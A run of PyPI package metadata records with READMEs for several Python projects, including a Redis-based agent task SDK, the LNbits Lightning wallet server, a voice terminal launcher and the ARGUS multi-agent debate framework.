async def handle_task(ctx: UserContext, payload: dict) -> dict:
# Report progress
await ctx.report_progress("starting", percent=0)
# Access user data
profile = await ctx.get_user_profile()
# Call OAuth APIs on behalf of the user
events = await ctx.call_oauth_api(
provider="google",
method="GET",
path="/calendar/v3/calendars/primary/events"
)
await ctx.report_progress("completed", percent=100)
return {"status": "success", "events": len(events.get("items", []))}
async def main():
consumer = TaskConsumer(
agent_id="my-agent",
redis_url="redis://localhost:6379",
pxui_base_url="https://api.pixell.global",
handler=handle_task,
)
async with consumer:
await consumer.start()
if __name__ == "__main__":
asyncio.run(main())
```
### Core Components
| Component | Description |
|-----------|-------------|
| `TaskConsumer` | Redis task queue consumer with concurrency control |
| `UserContext` | Execution context with access to user data and OAuth APIs |
| `ProgressReporter` | Real-time progress updates via Redis pub/sub |
| `PXUIDataClient` | HTTP client for PXUI platform API |
### UserContext Methods
```python
# OAuth API calls (Google, GitHub, Slack, TikTok, etc.)
result = await ctx.call_oauth_api(provider, method, path, body?, headers?)
# User data access
profile = await ctx.get_user_profile()
files = await ctx.get_files(filter?, limit?)
content = await ctx.get_file_content(file_id)
conversations = await ctx.get_conversations(limit?, since?)
history = await ctx.get_task_history(agent_id?, limit?)
# Progress reporting
await ctx.report_progress(status, percent?, message?)
await ctx.report_error(error_type, message, recoverable?)
```
### Error Handling
```python
from pixell.sdk import (
AuthenticationError, # Invalid/expired token
RateLimitError, # Rate limit exceeded (check retry_after)
APIError, # API error response
ConnectionError, # Network failure
TaskTimeoutError, # Task exceeded timeout
)
try:
result = await ctx.call_oauth_api(...)
except RateLimitError as e:
retry_after = e.details.get("retry_after", 60)
await asyncio.sleep(retry_after)
except AuthenticationError:
# Token invalid - cannot retry
raise
```
### Configuration Options
```python
consumer = TaskConsumer(
agent_id="my-agent",
redis_url="redis://localhost:6379",
pxui_base_url="https://api.pixell.global",
handler=handle_task,
concurrency=10, # Max concurrent tasks (default: 10)
poll_interval=1.0, # Queue poll interval in seconds
task_timeout=300.0, # Task timeout in seconds (default: 5 min)
)
```
### Redis Queue Keys
- `pixell:agents:{agent_id}:tasks` - Main task queue
- `pixell:agents:{agent_id}:processing` - Tasks being processed
- `pixell:agents:{agent_id}:dead_letter` - Failed tasks
- `pixell:tasks:{task_id}:progress` - Progress pub/sub channel
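The key layout above can be produced with a couple of small helpers (these simply mirror the documented patterns; they are not part of the SDK's public API):

```python
def agent_key(agent_id: str, suffix: str) -> str:
    """Build a per-agent queue key, e.g. pixell:agents:my-agent:tasks."""
    return f"pixell:agents:{agent_id}:{suffix}"

def progress_channel(task_id: str) -> str:
    """Build the pub/sub channel for a task's progress updates."""
    return f"pixell:tasks:{task_id}:progress"
```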
---
## Documentation
See the [full documentation](https://docs.pixell.global/pixell) for detailed usage.
For SDK tutorials and advanced patterns, see [SDK_TUTORIAL.md](https://github.com/pixell-global/pixell-kit/blob/main/docs/SDK_TUTORIAL.md).
## Release & Deployment
The pixell-sdk package is **automatically published to PyPI via GitHub Actions** (not manual PyPI API uploads).
### Automatic Publishing
Every push to `main` triggers the publish workflow:
1. **Tests run** - All tests must pass
2. **Version check** - Compares version in `pyproject.toml` against PyPI
3. **Publish** - If version is new, automatically publishes to PyPI
### Publishing a New Version
```bash
# 1. Update version in pyproject.toml
# 2. Commit and push to main
git add pyproject.toml
git commit -m "chore: bump version to X.Y.Z"
git push origin main
# 3. GitHub Actions handles the rest automatically
```
### Manual Trigger
You can also trigger publishing manually via GitHub Actions:
1. Go to **Actions** → **Publish to PyPI on Main Push**
2. Click **Run workflow**
3. Optionally check **Force publish** to republish an existing version
### Workflow Files
- `.github/workflows/publish-main.yml` - Main publish workflow (push to main)
- `.github/workflows/publish.yml` - Release-based publish (on GitHub releases)
- `.github/workflows/test.yml` - CI tests
### Required Secrets
The following secret must be configured in GitHub repository settings:
- `PYPI_API_TOKEN` - PyPI API token for publishing
## License
This project is licensed under the [GNU Affero General Public License v3.0](LICENSE).
For organizations that do not wish to comply with AGPL-3.0 requirements,
commercial licensing options are available. Contact us at engineering@pixell.global.
| text/markdown | Pixell Core Team | Pixell Core Team <dev@pixell.global> | null | null | null | null | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Topic :: Software Development :: Build Tools",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Operating System :: OS Independent"
] | [] | https://github.com/pixell-global/pixell-kit | null | >=3.11 | [] | [] | [] | [
"click>=8.0",
"pydantic>=2.0",
"pyyaml>=6.0",
"jsonschema>=4.0",
"fastapi>=0.100.0",
"uvicorn>=0.23.0",
"watchdog>=3.0",
"python-dotenv>=1.0",
"tabulate>=0.9",
"jinja2>=3.0",
"requests>=2.28.0",
"redis>=5.0.0",
"httpx>=0.25.0",
"pyjwt>=2.8.0",
"pytest>=7.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"pytest-asyncio>=0.21; extra == \"dev\"",
"black>=23.0; extra == \"dev\"",
"mypy>=1.0; extra == \"dev\"",
"ruff>=0.1; extra == \"dev\"",
"build>=1.0; extra == \"dev\"",
"twine>=4.0; extra == \"dev\"",
"types-PyYAML>=6.0; extra == \"dev\"",
"fakeredis>=2.20.0; extra == \"dev\"",
"respx>=0.20.0; extra == \"dev\"",
"pytest-timeout>=2.0; extra == \"dev\"",
"python-gnupg>=0.5; extra == \"signing\""
] | [] | [] | [] | [
"Homepage, https://github.com/pixell-global/pixell-kit",
"Bug Tracker, https://github.com/pixell-global/pixell-kit/issues",
"Documentation, https://docs.pixell.global/pixell",
"Source Code, https://github.com/pixell-global/pixell-kit"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:06:26.446590 | pixell_sdk-0.4.32.tar.gz | 152,236 | 8e/cd/5c556975802f719d507b658dbc5e7965566c64d9503ced59b0df1be39d2e/pixell_sdk-0.4.32.tar.gz | source | sdist | null | false | f1806abc0fcacc4b3196e6b440bdaadf | 554d4560b334e4764e4066df719a3179d4ccfcdb21f1f017d47281f8dd51a355 | 8ecd5c556975802f719d507b658dbc5e7965566c64d9503ced59b0df1be39d2e | AGPL-3.0-only | [
"LICENSE"
] | 204 |
2.4 | esp-pylib | 0.1.3 | Python library for logging, utils and constants for Espressif Systems' Python projects | # esp-pylib
Python library for logging, utils and constants for Espressif Systems' Python projects.
## Installation
```bash
pip install esp-pylib
```
## How to Contribute
First, set up the development environment:
```bash
git clone https://github.com/espressif/esp-pylib.git
cd esp-pylib
python -m venv venv
source venv/bin/activate
pip install -e ".[dev]"
pre-commit install
```
## How to Release (For Maintainers Only)
```bash
python -m venv venv
source venv/bin/activate
pip install commitizen czespressif
git fetch
git checkout -b update/release_v1.1.0
git reset --hard origin/master
cz bump
git push -u
git push --tags
```
Create a pull request and edit the automatically created draft [release notes](https://github.com/espressif/esp-pylib/releases).
## License
This document and the attached source code are released under the Apache License, Version 2.0. See the accompanying [LICENSE](./LICENSE) file for a copy.
| text/markdown | Espressif Systems | null | null | null | Apache-2.0 | python, espressif | [
"Development Status :: 1 - Planning",
"Intended Audience :: Developers",
"Natural Language :: English",
"Environment :: Console",
"Topic :: Software Development :: Embedded Systems",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS :: MacOS X"
] | [] | null | null | >=3.7 | [] | [] | [] | [
"rich",
"pre-commit; extra == \"dev\"",
"czespressif; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/espressif/esp-pylib",
"Repository, https://github.com/espressif/esp-pylib",
"Source, https://github.com/espressif/esp-pylib/",
"Tracker, https://github.com/espressif/esp-pylib/issues/",
"Changelog, https://github.com/espressif/esp-pylib/blob/master/CHANGELOG.md"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:06:06.673608 | esp_pylib-0.1.3.tar.gz | 6,865 | 33/ad/2761f79ebca03d63f7a6dd326e9861ab68d89913f6a6fef3bcfeeeac83cf/esp_pylib-0.1.3.tar.gz | source | sdist | null | false | 2275deb8b47d91bb4d7d26cbac617d76 | 9c22b9d43a92a466d9e6777482b3138ab3ca33db377675f95c44027bf3eeaef1 | 33ad2761f79ebca03d63f7a6dd326e9861ab68d89913f6a6fef3bcfeeeac83cf | null | [
"LICENSE"
] | 224 |
2.4 | lnbits | 1.5.0rc2 | LNbits, free and open-source Lightning wallet and accounts system. | <a href="https://lnbits.com" target="_blank" rel="noopener noreferrer">
<picture>
<source media="(prefers-color-scheme: dark)" srcset="https://i.imgur.com/QE6SIrs.png">
<img src="https://i.imgur.com/fyKPgVT.png" alt="LNbits" style="width:300px">
</picture>
</a>
 [![license-badge]](LICENSE) [![docs-badge]][docs]  [](https://extensions.lnbits.com/) [](https://shop.lnbits.com/) [<img src="https://img.shields.io/badge/community_chat-Telegram-24A1DE">](https://t.me/lnbits) [<img src="https://img.shields.io/badge/supported_by-%3E__OpenSats-f97316">](https://opensats.org)
<img width="2000" height="203" alt="lnbits_head" src="https://github.com/user-attachments/assets/77669718-ac10-43c7-ae95-6ce236c77401" />
[](https://demo.lnbits.com/tipjar/DwaUiE4kBX6mUW6pj3X5Kg)
# LNbits — The most powerful Bitcoin & Lightning toolkit
> Run it for yourself, for your community, or as part of a larger stack.
## What is LNbits?
LNbits is a lightweight Python server that sits on top of your Lightning funding source. It gives you safe, isolated wallets, a clean API, and an extension system for rapidly adding features - without locking you into a single node implementation. The inspiration for LNbits came from ideas pioneered by **OpenNode** and **LNPay**, both of which now work as funding sources for LNbits.
## What you can do with LNbits
- **Harden app security:** Create per-wallet API keys so individual apps never touch your full balance.
- **Extend functionality fast:** Install extensions to explore and ship Lightning features with minimal code.
- **Build into your stack:** Use the LNbits HTTP API to integrate payments, wallets, and accounting.
- **Cover LNURL flows:** Use LNbits as a reliable fallback wallet for LNURL.
- **Demo in minutes:** Spin up instant wallets for workshops, proofs-of-concept, and user testing.
## Funding sources
LNbits runs on top of most Lightning backends. Choose the one you already operate - or swap later without changing your app architecture.
- Read the [funding source guide](https://docs.lnbits.org/guide/wallets.html)
## Learn more
- Video series on [Youtube](https://www.youtube.com/@lnbits)
- Introduction Video [LNBits V1](https://www.youtube.com/watch?v=PFAHKxvgI9Y&t=19s)
## Running LNbits
See the [install guide](https://github.com/lnbits/lnbits/blob/main/docs/guide/installation.md) for details on installation and setup.
Get familiar with LNbits and test it on our demo server [demo.lnbits.com](https://demo.lnbits.com), or on [lnbits.com](https://lnbits.com), the software-as-a-service offering, where you can spin up an LNbits instance for 21 sats per hour.
## LNbits account system
LNbits is packaged with tools to help manage funds, such as a transactions table, a spending line chart, and CSV export. Each wallet also comes with its own API keys, helping to partition the exposure of your funding source.
<img src="https://i.imgur.com/w8jdGpF.png" style="width:800px">
## LNbits extension universe
Extend YOUR LNbits to meet YOUR needs.
All non-core features are installed as extensions, reducing your code base and making your LNbits unique to you. Extend your LNbits install in any direction, and even create and share your own extensions.
<img src="https://i.imgur.com/aEBpwJF.png" style="width:800px">
## LNbits API
LNbits has a powerful API; many projects use LNbits to do the heavy lifting for their Bitcoin/Lightning services.
<img src="https://i.imgur.com/V742sb9.png" style="width:800px">
## LNbits node manager
LNbits comes packaged with a light node management UI, to make running your node that much easier.
<img src="https://i.imgur.com/TYqIK60.png" style="width:800px">
## LNbits across all your devices
As well as working great in a browser, LNbits has native iOS and Android apps and a Chrome extension, so you can enjoy the same UI across all your devices.
<img src="https://i.imgur.com/J96EbRf.png" style="width:800px">
## Powered by LNbits
LNbits empowers everyone with modular, open-source tools for building Bitcoin-based systems — fast, free, and extendable.
[](https://shop.lnbits.com/)
[](https://shop.lnbits.com/)
[](https://my.lnbits.com/login)
[](https://news.lnbits.com/)
[](https://extensions.lnbits.com/) [](https://demo.lnbits.com/tipjar/DwaUiE4kBX6mUW6pj3X5Kg)
[docs]: https://github.com/lnbits/lnbits/wiki
[docs-badge]: https://img.shields.io/badge/docs-lnbits.org-673ab7.svg
[github-mypy]: https://github.com/lnbits/lnbits/actions?query=workflow%3Amypy
[github-mypy-badge]: https://github.com/lnbits/lnbits/workflows/mypy/badge.svg
[github-tests]: https://github.com/lnbits/lnbits/actions?query=workflow%3Atests
[github-tests-badge]: https://github.com/lnbits/lnbits/workflows/tests/badge.svg
[codecov]: https://codecov.io/gh/lnbits/lnbits
[codecov-badge]: https://codecov.io/gh/lnbits/lnbits/branch/master/graph/badge.svg
[license-badge]: https://img.shields.io/badge/license-MIT-blue.svg
| text/markdown | null | Alan Bits <alan@lnbits.com> | null | null | null | null | [] | [] | null | null | <3.13,>=3.10 | [] | [] | [] | [
"aiosqlite==0.22.1",
"asyncpg==0.31.0",
"bcrypt==5.0.0",
"bech32==1.2.0",
"bolt11==2.1.1",
"click==8.3.1",
"embit==0.8.0",
"fastapi-sso==0.19.0",
"fastapi==0.116.1",
"filetype==1.2.0",
"greenlet<4.0.0,>=3.3.0",
"grpcio==1.76.0",
"httpx==0.27.2",
"itsdangerous==2.2.0",
"jinja2==3.1.6",
"jsonpath-ng==1.7.0",
"lnurl==0.8.3",
"loguru==0.7.3",
"nostr-sdk==0.44.0",
"packaging==25.0",
"pillow>=12.1.0",
"protobuf==6.33.2",
"pycryptodomex==3.23.0",
"pydantic==1.10.26",
"pyjwt==2.10.1",
"pyln-client==25.12",
"pynostr==0.7.0",
"pyqrcode==1.2.1",
"python-crontab==3.3.0",
"python-dotenv>=1.2.1",
"python-multipart==0.0.21",
"pywebpush==2.2.0",
"shortuuid==1.0.13",
"slowapi==0.1.9",
"sqlalchemy==1.4.54",
"sse-starlette==2.3.6",
"starlette==0.47.1",
"typing-extensions==4.15.0",
"uvicorn==0.40.0",
"uvloop==0.22.1",
"websocket-client==1.9.0",
"websockets==15.0.1",
"breez-sdk-liquid==0.11.11; extra == \"breez\"",
"breez-sdk==0.8.0; extra == \"breez\"",
"wallycore==1.5.1; extra == \"liquid\"",
"psycopg2-binary==2.9.11; extra == \"migration\""
] | [] | [] | [] | [
"Homepage, https://lnbits.com",
"Repository, https://github.com/lnbits/lnbits"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:06:05.213497 | lnbits-1.5.0rc2.tar.gz | 3,852,237 | f4/04/b5dfd79e14fdfbebf508f02757b8e9e23cba1bfd4f34d7e7bc30651c2cf1/lnbits-1.5.0rc2.tar.gz | source | sdist | null | false | fd38aec3a943cacbd86cd4753430670d | 109820c9342c843ad2924dc7d7f4b4b86dc3fc5a8cc3834c814312d1e7c8aacf | f404b5dfd79e14fdfbebf508f02757b8e9e23cba1bfd4f34d7e7bc30651c2cf1 | null | [
"LICENSE"
] | 182 |
2.4 | brilliance-admin | 0.44.35 | Simple and lightweight data management framework powered by FastAPI and Vue3 Vuetify all-in-one. Some call it heavenly in its brilliance. | <div align="center">
<img src="https://github.com/brilliance-admin/backend-python/blob/main/example/static/logo-outline.png?raw=true"
alt="Brilliance Admin"
width="600">
[](https://pypi.org/project/brilliance-admin/)
[](https://github.com/brilliance-admin/backend-python/actions)
Simple and lightweight data management framework powered by `FastAPI` and `Vue3` `Vuetify` all-in-one. \
Integrated with `SQLAlchemy`. Inspired by Django Admin and DRF.\
_Some call it heavenly in its brilliance._
### [Live Demo](https://brilliance-admin.com/) | [Demo Sources](https://github.com/brilliance-admin/backend-python/tree/main/example) | [Showcase + Documentation](https://docs.brilliance-admin.com/)
Old repo: https://github.com/Innova-Group-LLC/custom_admin
<img src="https://raw.githubusercontent.com/brilliance-admin/.github/refs/heads/main/screenshots/04.02.2026/all-devices-black.png"
alt="Preview">
<sub>Every ⭐ - helps to make it even more brilliant!</sub>
</div>
> [!TIP]
> If you found a bug or have a feature request, feel free to open an issue.
> [!WARNING]
> Not production-ready; work in progress.
Full documentation, including a project overview, getting-started guide, configuration reference, API examples, and component usage, is available in the [Documentation](https://docs.brilliance-admin.com/) (hosted on GitHub Pages)
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"asgiref>=3.11",
"fastapi>=0.115",
"jinja2>=3.1",
"PyYAML>=6.0",
"uvicorn>=0.34.0; extra == \"example\"",
"faker>=38.2.0; extra == \"example\"",
"pyjwt>=2.10.1; extra == \"example\"",
"structlog>=25.5.0; extra == \"example\"",
"rich>=14.2.0; extra == \"example\"",
"asyncpg>=0.31.0; extra == \"example\"",
"pydantic-settings>=2.12.0; extra == \"example\"",
"twine; extra == \"example\"",
"pytest>=8.4.2; extra == \"tests\"",
"pytest-asyncio>=1.2.0; extra == \"tests\"",
"httpx>=0.28.1; extra == \"tests\"",
"pytest-mock>=3.15.1; extra == \"tests\"",
"sqlalchemy>=2.0.41; extra == \"tests\"",
"aiosqlite>=0.22.1; extra == \"tests\"",
"factory-boy>=3.3.3; extra == \"tests\"",
"pyjwt>=2.10.1; extra == \"tests\"",
"testcontainers>=4.14.1; extra == \"tests\"",
"scalar-fastapi>=1.5.0; extra == \"scalar\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:05:49.926556 | brilliance_admin-0.44.35.tar.gz | 3,677,652 | 4c/4b/070afbab7bd2a5a294d06f64161185d616f483755294d95066a493d2796c/brilliance_admin-0.44.35.tar.gz | source | sdist | null | false | 6901f348a8460e0b97fb1296adfd0a84 | ef878a84e5b583e08838758dcfe8613c98c764bce8065c16275cd1a81cb74dc5 | 4c4b070afbab7bd2a5a294d06f64161185d616f483755294d95066a493d2796c | MIT | [
"LICENSE"
] | 214 |
2.4 | ai-news-scraper | 0.2.0 | A scraper for AI news from The Verge and VentureBeat with JSON export | # AI News Scraper
A lightweight Python package to track AI developments, investments, and trends from The Verge and VentureBeat.
## Installation
```bash
pip install ai-news-scraper
```
## View News
```bash
ai-news
```
## Save News to JSON
```bash
ai-news --save
```
## Save News with a specific name
```bash
ai-news --save --filename morning_report.json
```
| text/markdown | Your Name | your.email@example.com | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"feedparser<7.0.0,>=6.0.10",
"requests<3.0.0,>=2.31.0"
] | [] | [] | [] | [] | poetry/2.3.2 CPython/3.13.3 Windows/11 | 2026-02-20T09:05:43.107314 | ai_news_scraper-0.2.0-py3-none-any.whl | 3,218 | b8/a3/1cb024244b68c1849aea46a9df22ed0f259b1667627718acf24263e1a6a4/ai_news_scraper-0.2.0-py3-none-any.whl | py3 | bdist_wheel | null | false | f9440c2bb9cdc3a3dec12e0b5c72a9ca | da24eb1741ac73b494923892e285576b61c728e0ba1f75dbb5f3987f3ae898cf | b8a31cb024244b68c1849aea46a9df22ed0f259b1667627718acf24263e1a6a4 | null | [] | 234 |
2.4 | voiceterm | 1.0.87 | Voice-first terminal HUD for Codex and Claude with local Whisper STT | # VoiceTerm
Voice-first terminal HUD for AI CLIs.
Talk instead of type with local Whisper transcription, then send directly to your CLI.
Primary support: Codex and Claude Code.
## Install
```bash
pipx install voiceterm
# or
python3 -m pip install --user voiceterm
```
Then run:
```bash
voiceterm
```
Authenticate your backend once if needed:
```bash
voiceterm --login --codex
voiceterm --login --claude
```
## What This Package Does
The PyPI package installs the `voiceterm` launcher.
On first run, it bootstraps the native VoiceTerm binary into:
- `~/.local/share/voiceterm/native/bin/voiceterm` (default)
By default it builds from the official VoiceTerm repository at the matching
tag (`v<package-version>`).
## Runtime Requirements
- `git`
- Rust toolchain (`cargo`, `rustc`)
- macOS or Linux (Windows via WSL2)
## Optional Environment Overrides
- `VOICETERM_NATIVE_BIN=/absolute/path/to/voiceterm`
- Use an already-installed native binary and skip bootstrap.
- `VOICETERM_PY_NATIVE_ROOT=/custom/root`
- Change where the bootstrap binary is installed.
- `VOICETERM_REPO_URL=https://github.com/jguida941/voiceterm`
- Use a different source repository URL.
- `VOICETERM_REPO_REF=v1.0.69`
- Use a different git tag/branch/commit for bootstrap.
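For example, the overrides can be combined on the command line (the binary path and fork URL below are placeholders, not defaults):

```shell
# Use an already-built binary and skip the bootstrap entirely
VOICETERM_NATIVE_BIN="$HOME/.cargo/bin/voiceterm" voiceterm

# Bootstrap from a fork, pinned to a specific tag
VOICETERM_REPO_URL=https://github.com/yourname/voiceterm \
VOICETERM_REPO_REF=v1.0.69 \
voiceterm
```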
## Documentation
- Main repository: <https://github.com/jguida941/voiceterm>
- Install guide: <https://github.com/jguida941/voiceterm/blob/master/guides/INSTALL.md>
- Usage guide: <https://github.com/jguida941/voiceterm/blob/master/guides/USAGE.md>
- CLI flags: <https://github.com/jguida941/voiceterm/blob/master/guides/CLI_FLAGS.md>
- Troubleshooting: <https://github.com/jguida941/voiceterm/blob/master/guides/TROUBLESHOOTING.md>
| text/markdown | Justin Guida | null | null | null | MIT | claude, cli, codex, terminal, voice, whisper | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Software Development :: User Interfaces"
] | [] | null | null | >=3.9 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/jguida941/voiceterm",
"Repository, https://github.com/jguida941/voiceterm",
"Documentation, https://github.com/jguida941/voiceterm/blob/master/README.md",
"Issues, https://github.com/jguida941/voiceterm/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:04:23.956804 | voiceterm-1.0.87.tar.gz | 3,703 | f2/71/923bd912931e5b745b91f09b0667164adb47a60b07270f318de961dea271/voiceterm-1.0.87.tar.gz | source | sdist | null | false | 049601ea9ac3e48d86c083ee2064c9be | 785eb797e85935b4abecddcf7a7c722c713b5a6ad6770aca6080f64b926aa7de | f271923bd912931e5b745b91f09b0667164adb47a60b07270f318de961dea271 | null | [] | 206 |
2.4 | argus-debate-ai | 3.1.0 | ARGUS: Production-ready multi-agent AI debate framework with RAG, Bayesian reasoning, provenance tracking, 50+ tool integrations, OpenAPI REST generation, context caching/compression, and advanced LLM orchestration for scientific discovery, fact-checking, and evidence-based decision-making | # ARGUS
**Agentic Research & Governance Unified System**
*A debate-native, multi-agent AI framework for evidence-based reasoning with structured argumentation, decision-theoretic planning, and full provenance tracking.*
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
[](https://pypi.org/project/argus-debate-ai/3.1.0/)
[](https://github.com/psf/black)
[](https://mypy.readthedocs.io/)
[](https://github.com/Ronit26Mehta/argus-ai-debate#tool-integrations-50)
[](https://github.com/Ronit26Mehta/argus-ai-debate#llm-providers-27)
---
## Table of Contents
- [Overview](#overview)
- [Key Innovations](#key-innovations)
- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [LLM Providers](#llm-providers)
- [Tool Integrations (50+)](#tool-integrations-50)
- [OpenAPI REST Integration](#openapi-rest-integration)
- [Context Caching](#context-caching)
- [Context Compression](#context-compression)
- [Debate Visualization](#debate-visualization)
- [External Connectors](#external-connectors)
- [Visualization & Plotting](#visualization--plotting)
- [Argus Terminal (TUI)](#argus-terminal-tui)
- [Argus-Viz (Streamlit Sandbox)](#argus-viz-streamlit-sandbox)
- [CRUX Protocol](#crux-protocol)
- [Command Line Interface](#command-line-interface)
- [Configuration](#configuration)
- [Architecture](#architecture)
- [Core Components](#core-components)
- [Algorithms](#algorithms)
- [API Reference](#api-reference)
- [Examples](#examples)
- [Testing](#testing)
- [Deployment](#deployment)
- [Contributing](#contributing)
- [License](#license)
---
## Overview
ARGUS implements **Research Debate Chain (RDC)** - a novel approach to AI reasoning that structures knowledge evaluation as multi-agent debates. Instead of single-pass inference, ARGUS orchestrates specialist agents that gather evidence, generate rebuttals, and render verdicts through Bayesian aggregation.
### Why ARGUS?
Traditional LLM applications suffer from:
- **Hallucination**: Models generate plausible but incorrect information
- **Overconfidence**: No calibrated uncertainty estimates
- **Opacity**: Black-box reasoning with no audit trail
- **Single-Point Failure**: One model, one perspective
ARGUS addresses these through:
- **Adversarial Debate**: Multiple agents challenge claims with evidence
- **Bayesian Aggregation**: Calibrated confidence through probability theory
- **Full Provenance**: Every claim traced to its source
- **Multi-Model Support**: Use different LLMs for different roles
---
## Key Innovations
### Conceptual Debate Graph (C-DAG)
A directed graph structure where propositions, evidence, and rebuttals are nodes with signed edges representing support/attack relationships. The graph enables:
- Structured argument representation
- Influence propagation via Bayesian updating
- Conflict detection and resolution
- Visual debugging and analysis
### Evidence-Directed Debate Orchestration (EDDO)
Algorithm for managing multi-round debates with configurable stopping criteria:
- Convergence detection (posterior stability)
- Maximum rounds enforcement
- Budget-based termination
- Information gain thresholds
### Value of Information Planning
Decision-theoretic experiment selection using Expected Information Gain (EIG):
- Prioritize high-value evidence gathering
- Optimal resource allocation under constraints
- Monte Carlo estimation of information value
### Full Provenance Tracking
PROV-O compatible ledger with hash-chain integrity:
- W3C standard compliance
- Cryptographic attestations
- Complete audit trails
- Tamper detection
---
## Features
### Multi-Agent Debate System
| Agent | Role | Capabilities |
|-------|------|--------------|
| **Moderator** | Orchestration | Creates debate agendas, manages rounds, evaluates stopping criteria, breaks ties |
| **Specialist** | Evidence Gathering | Domain-specific research, hybrid retrieval, source quality assessment |
| **Refuter** | Challenge Generation | Counter-evidence, methodological critiques, logical fallacy detection |
| **Jury** | Verdict Rendering | Bayesian aggregation, confidence calibration, label assignment |
### Conceptual Debate Graph (C-DAG)
**Node Types:**
| Type | Description | Attributes |
|------|-------------|------------|
| `Proposition` | Main claims under evaluation | text, prior, domain, status |
| `Evidence` | Supporting/attacking information | polarity, confidence, source, type |
| `Rebuttal` | Challenges to evidence | target_id, strength, rebuttal_type |
| `Finding` | Intermediate conclusions | derived_from, confidence |
| `Assumption` | Underlying premises | explicit, challenged |
**Edge Types:**
| Type | Polarity | Description |
|------|----------|-------------|
| `SUPPORTS` | +1 | Evidence supporting a proposition |
| `ATTACKS` | -1 | Evidence challenging a proposition |
| `REBUTS` | -1 | Rebuttal targeting evidence |
| `REFINES` | 0 | Clarification or specification |
**Propagation:** Log-odds Bayesian belief updating across the graph with configurable decay and damping.
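The actual propagation code is not shown here, but the core idea of signed log-odds updating can be sketched as follows (the `(polarity, weight)` evidence encoding and the `damping` parameter are illustrative assumptions, not ARGUS's API):

```python
import math

def logit(p):
    return math.log(p / (1.0 - p))

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def update_posterior(prior, evidence, damping=1.0):
    """Combine signed evidence in log-odds space.

    `evidence` is a list of (polarity, weight) pairs: polarity is +1 for
    SUPPORTS and -1 for ATTACKS; weight is a strength in [0, 1].
    """
    log_odds = logit(prior)
    for polarity, weight in evidence:
        log_odds += damping * polarity * weight
    return sigmoid(log_odds)

# One strong supporting item, one weaker attacking item
posterior = update_posterior(0.5, [(+1, 0.9), (-1, 0.4)])
print(f"{posterior:.3f}")  # ≈ 0.622
```

Working in log-odds makes the update additive, so independent pieces of evidence simply sum before mapping back to a probability.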
### Hybrid Retrieval System
```
┌─────────────────────────────────────────────────────────────┐
│ Hybrid Retriever │
├─────────────────────────────────────────────────────────────┤
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ BM25 Sparse │ │ FAISS Dense │ │ Cross-Encoder│ │
│ │ Retrieval │ -> │ Retrieval │ -> │ Reranking │ │
│ └─────────────┘ └─────────────┘ └─────────────┘ │
│ │ │ │ │
│ v v v │
│ ┌─────────────────────────────────────────────────────┐ │
│ │ Reciprocal Rank Fusion (RRF) │ │
│ └─────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────┘
```
**Components:**
- **BM25 Sparse Retrieval**: Traditional keyword-based retrieval with TF-IDF scoring
- **FAISS Dense Retrieval**: Semantic vector search using sentence-transformers
- **Fusion Methods**: Weighted combination or Reciprocal Rank Fusion (RRF)
- **Cross-Encoder Reranking**: Neural reranking for precision (optional)
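Reciprocal Rank Fusion itself is a short algorithm; a self-contained sketch (not ARGUS's internal implementation) using the conventional k=60 constant:

```python
def reciprocal_rank_fusion(rankings, k=60):
    """Fuse several best-first ranked lists of document ids.

    Each document scores sum(1 / (k + rank)) over the lists it appears in.
    """
    scores = {}
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking, start=1):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)

sparse = ["d3", "d1", "d7"]  # e.g. BM25 order
dense = ["d1", "d9", "d3"]   # e.g. FAISS order
fused = reciprocal_rank_fusion([sparse, dense])
print(fused)  # d1 and d3 rise to the top: both lists rank them highly
```

Because RRF only consumes ranks, it needs no score normalization between the sparse and dense retrievers, which is why it is a popular fusion default.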
### Decision-Theoretic Planning
**Expected Information Gain (EIG):**
```python
# Estimate value of an experiment
planner = VoIPlanner(llm=llm, n_samples=1000)
ranked_actions = planner.rank_by_eig(experiments, current_belief)
# Select optimal action set under budget constraint
optimal_set = planner.select_under_budget(experiments, budget=100)
```
**Calibration:**
- Brier Score assessment
- Expected Calibration Error (ECE)
- Temperature scaling for confidence adjustment
